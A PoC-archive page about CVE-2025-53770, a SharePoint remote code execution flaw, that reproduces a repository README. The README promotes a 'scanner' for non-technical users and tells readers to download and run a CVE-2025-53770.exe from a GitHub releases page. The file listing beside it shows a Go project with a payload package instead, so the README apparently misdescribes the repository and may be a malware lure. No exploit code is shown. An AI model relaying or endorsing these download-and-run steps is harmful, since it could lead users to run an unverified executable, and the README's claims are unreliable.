Goal Reached Thanks to every supporter β€” we hit 100%!

Goal: 1000 CNY Β· Raised: 1000 CNY

100.0%

CVE-2025-53770 PoC β€” Microsoft SharePoint Server Remote Code Execution Vulnerability

Source
Associated Vulnerability
Title:Microsoft SharePoint Server Remote Code Execution Vulnerability (CVE-2025-53770)
Description:Deserialization of untrusted data in on-premises Microsoft SharePoint Server allows an unauthorized attacker to execute code over a network. Microsoft is aware that an exploit for CVE-2025-53770 exists in the wild. Microsoft is preparing and fully testing a comprehensive update to address this vulnerability. In the meantime, please make sure that the mitigation provided in this CVE documentation is in place so that you are protected from exploitation.
Readme
# πŸš€ CVE-2025-53770 - Scan SharePoint Vulnerabilities Easily

![Download CVE-2025-53770](https://img.shields.io/badge/Download-CVE--2025--53770-brightgreen)

## πŸ“– Overview

CVE-2025-53770 is a scanner designed to find the Remote Code Execution (RCE) zero day vulnerability in SharePoint. This tool helps users identify potential security risks in their SharePoint installations, ensuring they can take action to protect their systems.

## πŸ› οΈ Features

- **Easy to Use:** Designed for everyone, even those without a technical background.
- **Comprehensive Scanning:** Detects vulnerabilities associated with CVE-2025-53770.
- **User-Friendly Interface:** Navigate the tool without hassle.
- **Quick Setup:** Start scanning in just a few minutes.

## πŸ” System Requirements

- **Operating System:** Windows 10/11 or equivalent.
- **Memory:** Minimum 4 GB RAM.
- **Disk Space:** At least 200 MB of free space.
- **Network Access:** Internet access for updates and vulnerability checks.

## πŸš€ Getting Started

Follow these steps to download and run CVE-2025-53770:

1. **Visit the Releases Page:** Go to [this page to download](https://github.com/fentnttntnt/CVE-2025-53770/releases).
   
2. **Choose the Latest Version:** On the releases page, find the most recent version. Click on the version number to open the details.

3. **Download the Scanner:** Look for the file named something like `CVE-2025-53770.exe`. Click on it to start downloading.

4. **Install the Scanner:**
   - Locate the downloaded file in your downloads folder.
   - Double-click the file to run the installer.
   - Follow the on-screen instructions to finish the installation.

## 🌟 Download & Install

Download the scanner directly from the [Releases page](https://github.com/fentnttntnt/CVE-2025-53770/releases) and follow the installation steps described above.

## πŸ“Š How to Use the Scanner

1. **Open the Application:** After installation, find the app in your Start menu or desktop.
   
2. **Start Scanning:**
   - Click β€œScan” to begin.
   - Wait for the app to analyze your SharePoint installation for vulnerabilities.

3. **Review Results:**
   - Once the scan is complete, review the results in the application.
   - The scanner will highlight any detected vulnerabilities associated with CVE-2025-53770.

4. **Take Action:** If any vulnerabilities are found, refer to your SharePoint documentation or a qualified professional for the next steps.

## πŸ”„ Updating the Scanner

To keep the scanner efficient and secure, make sure to check for updates regularly. You can find and download the latest versions from the [Releases page](https://github.com/fentnttntnt/CVE-2025-53770/releases).

## πŸ“ Contributing

If you'd like to contribute to this project, feel free to fork the repository and submit a pull request with your changes. We welcome improvements and suggestions from the community.

## 🀝 Support

If you have any questions or need assistance, please open an issue in this repository. We will do our best to respond quickly and help you resolve any issues.

## πŸ“š More Resources

For additional information on CVE-2025-53770, please visit the following links:

- [CVE-2025-53770 Overview](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-53770)
- [SharePoint Security Best Practices](https://docs.microsoft.com/en-us/sharepoint/security/sharepoint-security-best-practices)

Your safety is a priority. Use CVE-2025-53770 to scan your SharePoint environment and stay secure.
File Snapshot

[4.0K] /data/pocs/c33a5325f0421abadda710c0bb3fdd52e49dbc77 β”œβ”€β”€ [4.0K] cmd β”‚Β Β  └── [2.7K] main.go β”œβ”€β”€ [ 848] Dockerfile β”œβ”€β”€ [ 169] go.mod β”œβ”€β”€ [1.6K] go.sum β”œβ”€β”€ [ 48] Makefile β”œβ”€β”€ [4.0K] pkg β”‚Β Β  └── [4.0K] payload β”‚Β Β  β”œβ”€β”€ [2.4K] extract.go β”‚Β Β  β”œβ”€β”€ [3.5K] payload.go β”‚Β Β  β”œβ”€β”€ [1.7K] test.go β”‚Β Β  └── [ 685] test_payload.go └── [3.4K] README.md 3 directories, 10 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers β€” if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online β€” thank you for the support. View subscription plans β†’